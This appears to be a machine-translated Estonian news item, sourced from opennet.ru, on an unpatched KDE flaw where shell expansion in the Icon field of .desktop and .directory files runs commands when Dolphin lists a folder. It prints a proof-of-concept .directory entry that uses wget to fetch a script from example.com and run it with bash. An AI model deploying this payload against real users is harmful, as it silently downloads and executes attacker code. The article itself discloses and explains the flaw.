KDE haavatavus, mis vÔimaldab koodi kÀivitada failide nimekirja vaatamisel

KDE-s tuvastatud haavatavus, misle, et rĂŒndaja suudab tĂ€ita juhuslikke kĂ€ske, kui kasutaja vaatab katalooge vĂ”i arhiive, mis sisaldavad spetsiaalselt vormindatud „.desktop“ ja „.directory“ faile. RĂŒnnakuks piisab, kui kasutaja lihtsalt vaatab failide nimekirja failihalduris Dolphin, laadib alla pahatahtliku desktop-faili vĂ”i lohistab hiirega otsetee töölauale vĂ”i dokumenti. Probleem ilmneb aktuaalses vĂ€ljaandes KDE Frameworks 5.60.0 ja vanemates versioonides, kuni KDE 4-ni. Haavatavust ei ole jÀÀnud veel parandatud (CVE-d ei ole sellele mÀÀratud).

Probleemi pĂ”hjustab KDesktopFile klassi vale rakendamine, mis töötleb muutuja „Icon“ eksitavalt ja edastab vÀÀrtuse funktsioonile KConfigPrivate::expandString(), mis viib shell-spetsiaal mĂ€rkide avamise protsessini, sealhulgas töötleb stringe „$(..)“ kui kĂ€su tĂ€itmiseks. Vastupidiselt XDG spetsifikatsiooni nĂ”uetele teostatakse shell-ehituste avamine ilma seadete tĂŒĂŒbi eristamiseta, st mitte ainult kĂ€ivitatava rakenduse kĂ€surea mÀÀramisel, vaid ka vaikeikoonide mÀÀramisel.

NĂ€iteks, rĂŒnnaku jaoks on piisavalt saata kasutajale zip-arhiiv, mis sisaldab katalooge failiga «.directory», nagu:

[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

Kui proovitakse arhvi sisu vaadata failihalduris Dolphin, laaditakse ja kÀivitatakse skript https://example.com/FILENAME.sh.


Vaata videot

Allikas: opennet.ru

Osta usaldusvÀÀrne veebihosting DDoS kaitsega, VPS VDS serverid đŸ”„ Osta usaldusvÀÀrne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster